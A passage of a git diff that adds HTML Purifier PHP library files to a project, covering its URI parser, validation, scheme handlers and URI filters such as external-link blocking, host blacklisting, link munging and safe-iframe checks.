HTMLPurifier_Token_End. + * @param $name Tag name + * @return Generated HTMLPurifier_Token_End + */ + public function createEnd($name) { + $p = clone $this->p_end; + $p->__construct($name); + return $p; + } + + /** + * Creates a HTMLPurifier_Token_Empty. + * @param $name Tag name + * @param $attr Associative array of attributes + * @return Generated HTMLPurifier_Token_Empty + */ + public function createEmpty($name, $attr = array()) { + $p = clone $this->p_empty; + $p->__construct($name, $attr); + return $p; + } + + /** + * Creates a HTMLPurifier_Token_Text. + * @param $data Data of text token + * @return Generated HTMLPurifier_Token_Text + */ + public function createText($data) { + $p = clone $this->p_text; + $p->__construct($data); + return $p; + } + + /** + * Creates a HTMLPurifier_Token_Comment. + * @param $data Data of comment token + * @return Generated HTMLPurifier_Token_Comment + */ + public function createComment($data) { + $p = clone $this->p_comment; + $p->__construct($data); + return $p; + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/URI.php b/lib/htmlpurifier/library/HTMLPurifier/URI.php new file mode 100644 index 000000000..f158ef5e3 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/URI.php @@ -0,0 +1,242 @@ +<?php + +/** + * HTML Purifier's internal representation of a URI. + * @note + * Internal data-structures are completely escaped. If the data needs + * to be used in a non-URI context (which is very unlikely), be sure + * to decode it first. The URI may not necessarily be well-formed until + * validate() is called. + */ +class HTMLPurifier_URI +{ + + public $scheme, $userinfo, $host, $port, $path, $query, $fragment; + + /** + * @note Automatically normalizes scheme and port + */ + public function __construct($scheme, $userinfo, $host, $port, $path, $query, $fragment) { + $this->scheme = is_null($scheme) || ctype_lower($scheme) ? $scheme : strtolower($scheme); + $this->userinfo = $userinfo; + $this->host = $host; + $this->port = is_null($port) ? $port : (int) $port; + $this->path = $path; + $this->query = $query; + $this->fragment = $fragment; + } + + /** + * Retrieves a scheme object corresponding to the URI's scheme/default + * @param $config Instance of HTMLPurifier_Config + * @param $context Instance of HTMLPurifier_Context + * @return Scheme object appropriate for validating this URI + */ + public function getSchemeObj($config, $context) { + $registry = HTMLPurifier_URISchemeRegistry::instance(); + if ($this->scheme !== null) { + $scheme_obj = $registry->getScheme($this->scheme, $config, $context); + if (!$scheme_obj) return false; // invalid scheme, clean it out + } else { + // no scheme: retrieve the default one + $def = $config->getDefinition('URI'); + $scheme_obj = $def->getDefaultScheme($config, $context); + if (!$scheme_obj) { + // something funky happened to the default scheme object + trigger_error( + 'Default scheme object "' . $def->defaultScheme . '" was not readable', + E_USER_WARNING + ); + return false; + } + } + return $scheme_obj; + } + + /** + * Generic validation method applicable for all schemes. May modify + * this URI in order to get it into a compliant form. + * @param $config Instance of HTMLPurifier_Config + * @param $context Instance of HTMLPurifier_Context + * @return True if validation/filtering succeeds, false if failure + */ + public function validate($config, $context) { + + // ABNF definitions from RFC 3986 + $chars_sub_delims = '!$&\'()*+,;='; + $chars_gen_delims = ':/?#[]@'; + $chars_pchar = $chars_sub_delims . ':@'; + + // validate host + if (!is_null($this->host)) { + $host_def = new HTMLPurifier_AttrDef_URI_Host(); + $this->host = $host_def->validate($this->host, $config, $context); + if ($this->host === false) $this->host = null; + } + + // validate scheme + // NOTE: It's not appropriate to check whether or not this + // scheme is in our registry, since a URIFilter may convert a + // URI that we don't allow into one we do. So instead, we just + // check if the scheme can be dropped because there is no host + // and it is our default scheme. + if (!is_null($this->scheme) && is_null($this->host) || $this->host === '') { + // support for relative paths is pretty abysmal when the + // scheme is present, so axe it when possible + $def = $config->getDefinition('URI'); + if ($def->defaultScheme === $this->scheme) { + $this->scheme = null; + } + } + + // validate username + if (!is_null($this->userinfo)) { + $encoder = new HTMLPurifier_PercentEncoder($chars_sub_delims . ':'); + $this->userinfo = $encoder->encode($this->userinfo); + } + + // validate port + if (!is_null($this->port)) { + if ($this->port < 1 || $this->port > 65535) $this->port = null; + } + + // validate path + $path_parts = array(); + $segments_encoder = new HTMLPurifier_PercentEncoder($chars_pchar . '/'); + if (!is_null($this->host)) { // this catches $this->host === '' + // path-abempty (hier and relative) + // http://www.example.com/my/path + // //www.example.com/my/path (looks odd, but works, and + // recognized by most browsers) + // (this set is valid or invalid on a scheme by scheme + // basis, so we'll deal with it later) + // file:///my/path + // ///my/path + $this->path = $segments_encoder->encode($this->path); + } elseif ($this->path !== '') { + if ($this->path[0] === '/') { + // path-absolute (hier and relative) + // http:/my/path + // /my/path + if (strlen($this->path) >= 2 && $this->path[1] === '/') { + // This could happen if both the host gets stripped + // out + // http://my/path + // //my/path + $this->path = ''; + } else { + $this->path = $segments_encoder->encode($this->path); + } + } elseif (!is_null($this->scheme)) { + // path-rootless (hier) + // http:my/path + // Short circuit evaluation means we don't need to check nz + $this->path = $segments_encoder->encode($this->path); + } else { + // path-noscheme (relative) + // my/path + // (once again, not checking nz) + $segment_nc_encoder = new HTMLPurifier_PercentEncoder($chars_sub_delims . '@'); + $c = strpos($this->path, '/'); + if ($c !== false) { + $this->path = + $segment_nc_encoder->encode(substr($this->path, 0, $c)) . + $segments_encoder->encode(substr($this->path, $c)); + } else { + $this->path = $segment_nc_encoder->encode($this->path); + } + } + } else { + // path-empty (hier and relative) + $this->path = ''; // just to be safe + } + + // qf = query and fragment + $qf_encoder = new HTMLPurifier_PercentEncoder($chars_pchar . '/?'); + + if (!is_null($this->query)) { + $this->query = $qf_encoder->encode($this->query); + } + + if (!is_null($this->fragment)) { + $this->fragment = $qf_encoder->encode($this->fragment); + } + + return true; + + } + + /** + * Convert URI back to string + * @return String URI appropriate for output + */ + public function toString() { + // reconstruct authority + $authority = null; + // there is a rendering difference between a null authority + // (http:foo-bar) and an empty string authority + // (http:///foo-bar). + if (!is_null($this->host)) { + $authority = ''; + if(!is_null($this->userinfo)) $authority .= $this->userinfo . '@'; + $authority .= $this->host; + if(!is_null($this->port)) $authority .= ':' . $this->port; + } + + // Reconstruct the result + // One might wonder about parsing quirks from browsers after + // this reconstruction. Unfortunately, parsing behavior depends + // on what *scheme* was employed (file:///foo is handled *very* + // differently than http:///foo), so unfortunately we have to + // defer to the schemes to do the right thing. + $result = ''; + if (!is_null($this->scheme)) $result .= $this->scheme . ':'; + if (!is_null($authority)) $result .= '//' . $authority; + $result .= $this->path; + if (!is_null($this->query)) $result .= '?' . $this->query; + if (!is_null($this->fragment)) $result .= '#' . $this->fragment; + + return $result; + } + + /** + * Returns true if this URL might be considered a 'local' URL given + * the current context. This is true when the host is null, or + * when it matches the host supplied to the configuration. + * + * Note that this does not do any scheme checking, so it is mostly + * only appropriate for metadata that doesn't care about protocol + * security. isBenign is probably what you actually want. + */ + public function isLocal($config, $context) { + if ($this->host === null) return true; + $uri_def = $config->getDefinition('URI'); + if ($uri_def->host === $this->host) return true; + return false; + } + + /** + * Returns true if this URL should be considered a 'benign' URL, + * that is: + * + * - It is a local URL (isLocal), and + * - It has a equal or better level of security + */ + public function isBenign($config, $context) { + if (!$this->isLocal($config, $context)) return false; + + $scheme_obj = $this->getSchemeObj($config, $context); + if (!$scheme_obj) return false; // conservative approach + + $current_scheme_obj = $config->getDefinition('URI')->getDefaultScheme($config, $context); + if ($current_scheme_obj->secure) { + if (!$scheme_obj->secure) { + return false; + } + } + return true; + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/URIDefinition.php b/lib/htmlpurifier/library/HTMLPurifier/URIDefinition.php new file mode 100644 index 000000000..40e57bb7d --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/URIDefinition.php @@ -0,0 +1,102 @@ +<?php + +class HTMLPurifier_URIDefinition extends HTMLPurifier_Definition +{ + + public $type = 'URI'; + protected $filters = array(); + protected $postFilters = array(); + protected $registeredFilters = array(); + + /** + * HTMLPurifier_URI object of the base specified at %URI.Base + */ + public $base; + + /** + * String host to consider "home" base, derived off of $base + */ + public $host; + + /** + * Name of default scheme based on %URI.DefaultScheme and %URI.Base + */ + public $defaultScheme; + + public function __construct() { + $this->registerFilter(new HTMLPurifier_URIFilter_DisableExternal()); + $this->registerFilter(new HTMLPurifier_URIFilter_DisableExternalResources()); + $this->registerFilter(new HTMLPurifier_URIFilter_HostBlacklist()); + $this->registerFilter(new HTMLPurifier_URIFilter_SafeIframe()); + $this->registerFilter(new HTMLPurifier_URIFilter_MakeAbsolute()); + $this->registerFilter(new HTMLPurifier_URIFilter_Munge()); + } + + public function registerFilter($filter) { + $this->registeredFilters[$filter->name] = $filter; + } + + public function addFilter($filter, $config) { + $r = $filter->prepare($config); + if ($r === false) return; // null is ok, for backwards compat + if ($filter->post) { + $this->postFilters[$filter->name] = $filter; + } else { + $this->filters[$filter->name] = $filter; + } + } + + protected function doSetup($config) { + $this->setupMemberVariables($config); + $this->setupFilters($config); + } + + protected function setupFilters($config) { + foreach ($this->registeredFilters as $name => $filter) { + if ($filter->always_load) { + $this->addFilter($filter, $config); + } else { + $conf = $config->get('URI.' . $name); + if ($conf !== false && $conf !== null) { + $this->addFilter($filter, $config); + } + } + } + unset($this->registeredFilters); + } + + protected function setupMemberVariables($config) { + $this->host = $config->get('URI.Host'); + $base_uri = $config->get('URI.Base'); + if (!is_null($base_uri)) { + $parser = new HTMLPurifier_URIParser(); + $this->base = $parser->parse($base_uri); + $this->defaultScheme = $this->base->scheme; + if (is_null($this->host)) $this->host = $this->base->host; + } + if (is_null($this->defaultScheme)) $this->defaultScheme = $config->get('URI.DefaultScheme'); + } + + public function getDefaultScheme($config, $context) { + return HTMLPurifier_URISchemeRegistry::instance()->getScheme($this->defaultScheme, $config, $context); + } + + public function filter(&$uri, $config, $context) { + foreach ($this->filters as $name => $f) { + $result = $f->filter($uri, $config, $context); + if (!$result) return false; + } + return true; + } + + public function postFilter(&$uri, $config, $context) { + foreach ($this->postFilters as $name => $f) { + $result = $f->filter($uri, $config, $context); + if (!$result) return false; + } + return true; + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/URIFilter.php b/lib/htmlpurifier/library/HTMLPurifier/URIFilter.php new file mode 100644 index 000000000..6a1b0b08e --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/URIFilter.php @@ -0,0 +1,67 @@ +<?php + +/** + * Chainable filters for custom URI processing. + * + * These filters can perform custom actions on a URI filter object, + * including transformation or blacklisting. A filter named Foo + * must have a corresponding configuration directive %URI.Foo, + * unless always_load is specified to be true. + * + * The following contexts may be available while URIFilters are being + * processed: + * + * - EmbeddedURI: true if URI is an embedded resource that will + * be loaded automatically on page load + * - CurrentToken: a reference to the token that is currently + * being processed + * - CurrentAttr: the name of the attribute that is currently being + * processed + * - CurrentCSSProperty: the name of the CSS property that is + * currently being processed (if applicable) + * + * @warning This filter is called before scheme object validation occurs. + * Make sure, if you require a specific scheme object, you + * you check that it exists. This allows filters to convert + * proprietary URI schemes into regular ones. + */ +abstract class HTMLPurifier_URIFilter +{ + + /** + * Unique identifier of filter + */ + public $name; + + /** + * True if this filter should be run after scheme validation. + */ + public $post = false; + + /** + * True if this filter should always be loaded (this permits + * a filter to be named Foo without the corresponding %URI.Foo + * directive existing.) + */ + public $always_load = false; + + /** + * Performs initialization for the filter. If the filter returns + * false, this means that it shouldn't be considered active. + */ + public function prepare($config) {return true;} + + /** + * Filter a URI object + * @param $uri Reference to URI object variable + * @param $config Instance of HTMLPurifier_Config + * @param $context Instance of HTMLPurifier_Context + * @return bool Whether or not to continue processing: false indicates + * URL is no good, true indicates continue processing. Note that + * all changes are committed directly on the URI object + */ + abstract public function filter(&$uri, $config, $context); + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/URIFilter/DisableExternal.php b/lib/htmlpurifier/library/HTMLPurifier/URIFilter/DisableExternal.php new file mode 100644 index 000000000..d8a39a501 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/URIFilter/DisableExternal.php @@ -0,0 +1,23 @@ +<?php + +class HTMLPurifier_URIFilter_DisableExternal extends HTMLPurifier_URIFilter +{ + public $name = 'DisableExternal'; + protected $ourHostParts = false; + public function prepare($config) { + $our_host = $config->getDefinition('URI')->host; + if ($our_host !== null) $this->ourHostParts = array_reverse(explode('.', $our_host)); + } + public function filter(&$uri, $config, $context) { + if (is_null($uri->host)) return true; + if ($this->ourHostParts === false) return false; + $host_parts = array_reverse(explode('.', $uri->host)); + foreach ($this->ourHostParts as $i => $x) { + if (!isset($host_parts[$i])) return false; + if ($host_parts[$i] != $this->ourHostParts[$i]) return false; + } + return true; + } +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/URIFilter/DisableExternalResources.php b/lib/htmlpurifier/library/HTMLPurifier/URIFilter/DisableExternalResources.php new file mode 100644 index 000000000..881abc43c --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/URIFilter/DisableExternalResources.php @@ -0,0 +1,12 @@ +<?php + +class HTMLPurifier_URIFilter_DisableExternalResources extends HTMLPurifier_URIFilter_DisableExternal +{ + public $name = 'DisableExternalResources'; + public function filter(&$uri, $config, $context) { + if (!$context->get('EmbeddedURI', true)) return true; + return parent::filter($uri, $config, $context); + } +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/URIFilter/DisableResources.php b/lib/htmlpurifier/library/HTMLPurifier/URIFilter/DisableResources.php new file mode 100644 index 000000000..67538c7bb --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/URIFilter/DisableResources.php @@ -0,0 +1,11 @@ +<?php + +class HTMLPurifier_URIFilter_DisableResources extends HTMLPurifier_URIFilter +{ + public $name = 'DisableResources'; + public function filter(&$uri, $config, $context) { + return !$context->get('EmbeddedURI', true); + } +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/URIFilter/HostBlacklist.php b/lib/htmlpurifier/library/HTMLPurifier/URIFilter/HostBlacklist.php new file mode 100644 index 000000000..55fde3bf4 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/URIFilter/HostBlacklist.php @@ -0,0 +1,25 @@ +<?php + +// It's not clear to me whether or not Punycode means that hostnames +// do not have canonical forms anymore. As far as I can tell, it's +// not a problem (punycoding should be identity when no Unicode +// points are involved), but I'm not 100% sure +class HTMLPurifier_URIFilter_HostBlacklist extends HTMLPurifier_URIFilter +{ + public $name = 'HostBlacklist'; + protected $blacklist = array(); + public function prepare($config) { + $this->blacklist = $config->get('URI.HostBlacklist'); + return true; + } + public function filter(&$uri, $config, $context) { + foreach($this->blacklist as $blacklisted_host_fragment) { + if (strpos($uri->host, $blacklisted_host_fragment) !== false) { + return false; + } + } + return true; + } +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/URIFilter/MakeAbsolute.php b/lib/htmlpurifier/library/HTMLPurifier/URIFilter/MakeAbsolute.php new file mode 100644 index 000000000..f46ab2630 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/URIFilter/MakeAbsolute.php @@ -0,0 +1,114 @@ +<?php + +// does not support network paths + +class HTMLPurifier_URIFilter_MakeAbsolute extends HTMLPurifier_URIFilter +{ + public $name = 'MakeAbsolute'; + protected $base; + protected $basePathStack = array(); + public function prepare($config) { + $def = $config->getDefinition('URI'); + $this->base = $def->base; + if (is_null($this->base)) { + trigger_error('URI.MakeAbsolute is being ignored due to lack of value for URI.Base configuration', E_USER_WARNING); + return false; + } + $this->base->fragment = null; // fragment is invalid for base URI + $stack = explode('/', $this->base->path); + array_pop($stack); // discard last segment + $stack = $this->_collapseStack($stack); // do pre-parsing + $this->basePathStack = $stack; + return true; + } + public function filter(&$uri, $config, $context) { + if (is_null($this->base)) return true; // abort early + if ( + $uri->path === '' && is_null($uri->scheme) && + is_null($uri->host) && is_null($uri->query) && is_null($uri->fragment) + ) { + // reference to current document + $uri = clone $this->base; + return true; + } + if (!is_null($uri->scheme)) { + // absolute URI already: don't change + if (!is_null($uri->host)) return true; + $scheme_obj = $uri->getSchemeObj($config, $context); + if (!$scheme_obj) { + // scheme not recognized + return false; + } + if (!$scheme_obj->hierarchical) { + // non-hierarchal URI with explicit scheme, don't change + return true; + } + // special case: had a scheme but always is hierarchical and had no authority + } + if (!is_null($uri->host)) { + // network path, don't bother + return true; + } + if ($uri->path === '') { + $uri->path = $this->base->path; + } elseif ($uri->path[0] !== '/') { + // relative path, needs more complicated processing + $stack = explode('/', $uri->path); + $new_stack = array_merge($this->basePathStack, $stack); + if ($new_stack[0] !== '' && !is_null($this->base->host)) { + array_unshift($new_stack, ''); + } + $new_stack = $this->_collapseStack($new_stack); + $uri->path = implode('/', $new_stack); + } else { + // absolute path, but still we should collapse + $uri->path = implode('/', $this->_collapseStack(explode('/', $uri->path))); + } + // re-combine + $uri->scheme = $this->base->scheme; + if (is_null($uri->userinfo)) $uri->userinfo = $this->base->userinfo; + if (is_null($uri->host)) $uri->host = $this->base->host; + if (is_null($uri->port)) $uri->port = $this->base->port; + return true; + } + + /** + * Resolve dots and double-dots in a path stack + */ + private function _collapseStack($stack) { + $result = array(); + $is_folder = false; + for ($i = 0; isset($stack[$i]); $i++) { + $is_folder = false; + // absorb an internally duplicated slash + if ($stack[$i] == '' && $i && isset($stack[$i+1])) continue; + if ($stack[$i] == '..') { + if (!empty($result)) { + $segment = array_pop($result); + if ($segment === '' && empty($result)) { + // error case: attempted to back out too far: + // restore the leading slash + $result[] = ''; + } elseif ($segment === '..') { + $result[] = '..'; // cannot remove .. with .. + } + } else { + // relative path, preserve the double-dots + $result[] = '..'; + } + $is_folder = true; + continue; + } + if ($stack[$i] == '.') { + // silently absorb + $is_folder = true; + continue; + } + $result[] = $stack[$i]; + } + if ($is_folder) $result[] = ''; + return $result; + } +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/URIFilter/Munge.php b/lib/htmlpurifier/library/HTMLPurifier/URIFilter/Munge.php new file mode 100644 index 000000000..de695df14 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/URIFilter/Munge.php @@ -0,0 +1,53 @@ +<?php + +class HTMLPurifier_URIFilter_Munge extends HTMLPurifier_URIFilter +{ + public $name = 'Munge'; + public $post = true; + private $target, $parser, $doEmbed, $secretKey; + + protected $replace = array(); + + public function prepare($config) { + $this->target = $config->get('URI.' . $this->name); + $this->parser = new HTMLPurifier_URIParser(); + $this->doEmbed = $config->get('URI.MungeResources'); + $this->secretKey = $config->get('URI.MungeSecretKey'); + return true; + } + public function filter(&$uri, $config, $context) { + if ($context->get('EmbeddedURI', true) && !$this->doEmbed) return true; + + $scheme_obj = $uri->getSchemeObj($config, $context); + if (!$scheme_obj) return true; // ignore unknown schemes, maybe another postfilter did it + if (!$scheme_obj->browsable) return true; // ignore non-browseable schemes, since we can't munge those in a reasonable way + if ($uri->isBenign($config, $context)) return true; // don't redirect if a benign URL + + $this->makeReplace($uri, $config, $context); + $this->replace = array_map('rawurlencode', $this->replace); + + $new_uri = strtr($this->target, $this->replace); + $new_uri = $this->parser->parse($new_uri); + // don't redirect if the target host is the same as the + // starting host + if ($uri->host === $new_uri->host) return true; + $uri = $new_uri; // overwrite + return true; + } + + protected function makeReplace($uri, $config, $context) { + $string = $uri->toString(); + // always available + $this->replace['%s'] = $string; + $this->replace['%r'] = $context->get('EmbeddedURI', true); + $token = $context->get('CurrentToken', true); + $this->replace['%n'] = $token ? $token->name : null; + $this->replace['%m'] = $context->get('CurrentAttr', true); + $this->replace['%p'] = $context->get('CurrentCSSProperty', true); + // not always available + if ($this->secretKey) $this->replace['%t'] = sha1($this->secretKey . ':' . $string); + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/URIFilter/SafeIframe.php b/lib/htmlpurifier/library/HTMLPurifier/URIFilter/SafeIframe.php new file mode 100644 index 000000000..284bb13de --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/URIFilter/SafeIframe.php @@ -0,0 +1,35 @@ +<?php + +/** + * Implements safety checks for safe iframes. + * + * @warning This filter is *critical* for ensuring that %HTML.SafeIframe + * works safely. + */ +class HTMLPurifier_URIFilter_SafeIframe extends HTMLPurifier_URIFilter +{ + public $name = 'SafeIframe'; + public $always_load = true; + protected $regexp = NULL; + // XXX: The not so good bit about how this is all setup now is we + // can't check HTML.SafeIframe in the 'prepare' step: we have to + // defer till the actual filtering. + public function prepare($config) { + $this->regexp = $config->get('URI.SafeIframeRegexp'); + return true; + } + public function filter(&$uri, $config, $context) { + // check if filter not applicable + if (!$config->get('HTML.SafeIframe')) return true; + // check if the filter should actually trigger + if (!$context->get('EmbeddedURI', true)) return true; + $token = $context->get('CurrentToken', true); + if (!($token && $token->name == 'iframe')) return true; + // check if we actually have some whitelists enabled + if ($this->regexp === null) return false; + // actually check the whitelists + return preg_match($this->regexp, $uri->toString()); + } +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/URIParser.php b/lib/htmlpurifier/library/HTMLPurifier/URIParser.php new file mode 100644 index 000000000..7179e4ab8 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/URIParser.php @@ -0,0 +1,70 @@ +<?php + +/** + * Parses a URI into the components and fragment identifier as specified + * by RFC 3986. + */ +class HTMLPurifier_URIParser +{ + + /** + * Instance of HTMLPurifier_PercentEncoder to do normalization with. + */ + protected $percentEncoder; + + public function __construct() { + $this->percentEncoder = new HTMLPurifier_PercentEncoder(); + } + + /** + * Parses a URI. + * @param $uri string URI to parse + * @return HTMLPurifier_URI representation of URI. This representation has + * not been validated yet and may not conform to RFC. + */ + public function parse($uri) { + + $uri = $this->percentEncoder->normalize($uri); + + // Regexp is as per Appendix B. + // Note that ["<>] are an addition to the RFC's recommended + // characters, because they represent external delimeters. + $r_URI = '!'. + '(([^:/?#"<>]+):)?'. // 2. Scheme + '(//([^/?#"<>]*))?'. // 4. Authority + '([^?#"<>]*)'. // 5. Path + '(\?([^#"<>]*))?'. // 7. Query + '(#([^"<>]*))?'. // 8. Fragment + '!'; + + $matches = array(); + $result = preg_match($r_URI, $uri, $matches); + + if (!$result) return false; // *really* invalid URI + + // seperate out parts + $scheme = !empty($matches[1]) ? $matches[2] : null; + $authority = !empty($matches[3]) ? $matches[4] : null; + $path = $matches[5]; // always present, can be empty + $query = !empty($matches[6]) ? $matches[7] : null; + $fragment = !empty($matches[8]) ? $matches[9] : null; + + // further parse authority + if ($authority !== null) { + $r_authority = "/^((.+?)@)?(\[[^\]]+\]|[^:]*)(:(\d*))?/"; + $matches = array(); + preg_match($r_authority, $authority, $matches); + $userinfo = !empty($matches[1]) ? $matches[2] : null; + $host = !empty($matches[3]) ? $matches[3] : ''; + $port = !empty($matches[4]) ? (int) $matches[5] : null; + } else { + $port = $host = $userinfo = null; + } + + return new HTMLPurifier_URI( + $scheme, $userinfo, $host, $port, $path, $query, $fragment); + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/URIScheme.php b/lib/htmlpurifier/library/HTMLPurifier/URIScheme.php new file mode 100644 index 000000000..7be958143 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/URIScheme.php @@ -0,0 +1,95 @@ +<?php + +/** + * Validator for the components of a URI for a specific scheme + */ +abstract class HTMLPurifier_URIScheme +{ + + /** + * Scheme's default port (integer). If an explicit port number is + * specified that coincides with the default port, it will be + * elided. + */ + public $default_port = null; + + /** + * Whether or not URIs of this schem are locatable by a browser + * http and ftp are accessible, while mailto and news are not. + */ + public $browsable = false; + + /** + * Whether or not data transmitted over this scheme is encrypted. + * https is secure, http is not. + */ + public $secure = false; + + /** + * Whether or not the URI always uses <hier_part>, resolves edge cases + * with making relative URIs absolute + */ + public $hierarchical = false; + + /** + * Whether or not the URI may omit a hostname when the scheme is + * explicitly specified, ala file:///path/to/file. As of writing, + * 'file' is the only scheme that browsers support his properly. + */ + public $may_omit_host = false; + + /** + * Validates the components of a URI for a specific scheme. + * @param $uri Reference to a HTMLPurifier_URI object + * @param $config HTMLPurifier_Config object + * @param $context HTMLPurifier_Context object + * @return Bool success or failure + */ + public abstract function doValidate(&$uri, $config, $context); + + /** + * Public interface for validating components of a URI. Performs a + * bunch of default actions. Don't overload this method. + * @param $uri Reference to a HTMLPurifier_URI object + * @param $config HTMLPurifier_Config object + * @param $context HTMLPurifier_Context object + * @return Bool success or failure + */ + public function validate(&$uri, $config, $context) { + if ($this->default_port == $uri->port) $uri->port = null; + // kludge: browsers do funny things when the scheme but not the + // authority is set + if (!$this->may_omit_host && + // if the scheme is present, a missing host is always in error + (!is_null($uri->scheme) && ($uri->host === '' || is_null($uri->host))) || + // if the scheme is not present, a *blank* host is in error, + // since this translates into '///path' which most browsers + // interpret as being 'http://path'. + (is_null($uri->scheme) && $uri->host === '') + ) { + do { + if (is_null($uri->scheme)) { + if (substr($uri->path, 0, 2) != '//') { + $uri->host = null; + break; + } + // URI is '////path', so we cannot nullify the + // host to preserve semantics. Try expanding the + // hostname instead (fall through) + } + // first see if we can manually insert a hostname + $host = $config->get('URI.Host'); + if (!is_null($host)) { + $uri->host = $host; + } else { + // we can't do anything sensible, reject the URL. + return false; + } + } while (false); + } + return $this->doValidate($uri, $config, $context); + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/URIScheme/data.php b/lib/htmlpurifier/library/HTMLPurifier/URIScheme/data.php new file mode 100644 index 000000000..a5c43989e --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/URIScheme/data.php @@ -0,0 +1,96 @@ +<?php + +/** + * Implements data: URI for base64 encoded images supported by GD. + */ +class HTMLPurifier_URIScheme_data extends HTMLPurifier_URIScheme { + + public $browsable = true; + public $allowed_types = array( + // you better write validation code for other types if you + // decide to allow them + 'image/jpeg' => true, + 'image/gif' => true, + 'image/png' => true, + ); + // this is actually irrelevant since we only write out the path + // component + public $may_omit_host = true; + + public function doValidate(&$uri, $config, $context) { + $result = explode(',', $uri->path, 2); + $is_base64 = false; + $charset = null; + $content_type = null; + if (count($result) == 2) { + list($metadata, $data) = $result; + // do some legwork on the metadata + $metas = explode(';', $metadata); + while(!empty($metas)) { + $cur = array_shift($metas); + if ($cur == 'base64') { + $is_base64 = true; + break; + } + if (substr($cur, 0, 8) == 'charset=') { + // doesn't match if there are arbitrary spaces, but + // whatever dude + if ($charset !== null) continue; // garbage + $charset = substr($cur, 8); // not used + } else { + if ($content_type !== null) continue; // garbage + $content_type = $cur; + } + } + } else { + $data = $result[0]; + } + if ($content_type !== null && empty($this->allowed_types[$content_type])) { + return false; + } + if ($charset !== null) { + // error; we don't allow plaintext stuff + $charset = null; + } + $data = rawurldecode($data); + if ($is_base64) { + $raw_data = base64_decode($data); + } else { + $raw_data = $data; + } + // XXX probably want to refactor this into a general mechanism + // for filtering arbitrary content types + $file = tempnam("/tmp", ""); + file_put_contents($file, $raw_data); + if (function_exists('exif_imagetype')) { + $image_code = exif_imagetype($file); + } elseif (function_exists('getimagesize')) { + set_error_handler(array($this, 'muteErrorHandler')); + $info = getimagesize($file); + restore_error_handler(); + if ($info == false) return false; + $image_code = $info[2]; + } else { + trigger_error("could not find exif_imagetype or getimagesize functions", E_USER_ERROR); + } + $real_content_type = image_type_to_mime_type($image_code); + if ($real_content_type != $content_type) { + // we're nice guys; if the content type is something else we + // support, change it over + if (empty($this->allowed_types[$real_content_type])) return false; + $content_type = $real_content_type; + } + // ok, it's kosher, rewrite what we need + $uri->userinfo = null; + $uri->host = null; + $uri->port = null; + $uri->fragment = null; + $uri->query = null; + $uri->path = "$content_type;base64," . base64_encode($raw_data); + return true; + } + + public function muteErrorHandler($errno, $errstr) {} + +} + diff --git a/lib/htmlpurifier/library/HTMLPurifier/URIScheme/file.php b/lib/htmlpurifier/library/HTMLPurifier/URIScheme/file.php new file mode 100644 index 000000000..d74a3f198 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/URIScheme/file.php @@ -0,0 +1,32 @@ +<?php + +/** + * Validates file as defined by RFC 1630 and RFC 1738. + */ +class HTMLPurifier_URIScheme_file extends HTMLPurifier_URIScheme { + + // Generally file:// URLs are not accessible from most + // machines, so placing them as an img src is incorrect. + public $browsable = false; + + // Basically the *only* URI scheme for which this is true, since + // accessing files on the local machine is very common. In fact, + // browsers on some operating systems don't understand the + // authority, though I hear it is used on Windows to refer to + // network shares. + public $may_omit_host = true; + + public function doValidate(&$uri, $config, $context) { + // Authentication method is not supported + $uri->userinfo = null; + // file:// makes no provisions for accessing the resource + $uri->port = null; + // While it seems to work on Firefox, the querystring has + // no possible effect and is thus stripped. + $uri->query = null; + return true; + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/URIScheme/ftp.php b/lib/htmlpurifier/library/HTMLPurifier/URIScheme/ftp.php new file mode 100644 index 000000000..0fb2abf64 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/URIScheme/ftp.php @@ -0,0 +1,42 @@ +<?php + +/** + * Validates ftp (File Transfer Protocol) URIs as defined by generic RFC 1738. + */ +class HTMLPurifier_URIScheme_ftp extends HTMLPurifier_URIScheme { + + public $default_port = 21; + public $browsable = true; // usually + public $hierarchical = true; + + public function doValidate(&$uri, $config, $context) { + $uri->query = null; + + // typecode check + $semicolon_pos = strrpos($uri->path, ';'); // reverse + if ($semicolon_pos !== false) { + $type = substr($uri->path, $semicolon_pos + 1); // no semicolon + $uri->path = substr($uri->path, 0, $semicolon_pos); + $type_ret = ''; + if (strpos($type, '=') !== false) { + // figure out whether or not the declaration is correct + list($key, $typecode) = explode('=', $type, 2); + if ($key !== 'type') { + // invalid key, tack it back on encoded + $uri->path .= '%3B' . $type; + } elseif ($typecode === 'a' || $typecode === 